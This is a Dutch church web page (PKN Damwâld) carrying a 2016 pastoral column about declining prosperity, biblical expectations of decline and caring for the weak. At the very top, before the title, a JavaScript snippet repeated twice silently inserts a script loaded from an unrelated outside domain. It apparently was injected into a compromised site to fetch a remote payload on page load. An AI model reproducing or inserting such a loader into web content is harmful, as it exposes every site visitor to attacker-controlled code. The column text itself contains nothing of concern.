;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Voorspoed - PKN Damwâld

Voorspoed

Gepubliceerd op: vrijdag 30 september 2016

‘Kinderen krijgen het in de toekomst waarschijnlijk niet beter dan hun ouders’.
Deze stelling was onlangs in de media te lezen. Er komt een einde aan de lange periode van economische groei en vooruitgang. De groeicurve vlakt af.
Het is ook onmogelijk dat alle kinderen het beter zouden kunnen krijgen dan hun ouders. Zeker in West Europa en Noord Amerika. Want daar ligt de levensstandaard voor de ouders gemiddeld erg hoog. Als de kinderen daar nog een schepje boven op moeten doen, dan ontstaat een groot tekort aan grondstoffen, voedsel en levensruimte.
Het wordt helemaal onmogelijk als de rest van de wereldbevolking het westerse patroon zou moeten volgen. Stelt u zich voor dat iedere jongere op deze wereld als hij 18 wordt direct een auto gaat kopen en gebruiken. Of dat iedereen twee weken met het vliegtuig op vakantie gaat naar het buitenland. De wereld is hier letterlijk te klein voor.
‘Kinderen krijgen het in de toekomst waarschijnlijk niet beter dan hun ouders’.
In deze uitspraak hoor ik dat er een rem wordt gezet op de evolutie gedachte. Evolutie gaat uit van vooruitgang, steeds een stapje beter. In de Westerse wereld komt dit uitgangspunt fundamenteel onder druk te staan. Het zal niet steeds meer en beter worden. Een hele omschakeling in denken voor generaties die geleefd hebben vanuit de groei.
Dat zal betekenen dat de zwakken het steeds moeilijker zullen krijgen. De strijd om te overleven zal harder gestreden worden. Dat voorspelt weinig goeds voor mensen met een beperking, voor chronisch zieken en gehandicapten. Je kunt met je ogen dicht al haast voorspellen dat zij het in de toekomst niet beter gaan krijgen dan hun ouders.
‘Kinderen krijgen het in de toekomst waarschijnlijk niet beter dan hun ouders’.
Ik denk dat dit een Bijbelse lijn is. In de Bijbel wordt niet uitgegaan van een evolutie gedachte. De Bijbel rekent met een eind der tijden, een laatste dag. En het leven wordt er richting die dag niet gemakkelijker op. Jezus heeft daar belangrijke dingen over gezegd en ook het boek Openbaring laat dit zien. We hebben dus rekening te houden met teruggang, verval en strijd.
Het komt er meer en meer op aan dat wij ons geborgen weten in de liefde en macht van Jezus Christus. Dan kun je best met wat minder toe.
En wat evenveel belangrijk is: dat wij de zwakken niet vergeten! Oog hebben voor elkaar, voor de minder bedeelden op deze wereld.
Deze twee lessen mogen wij doorgeven aan onze kinderen. Al brengen zij (en wij!) daar maar een paar procent van in de praktijk, dan is er hoop voor de toekomst!

Columnist:Ds. G. Timmer

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns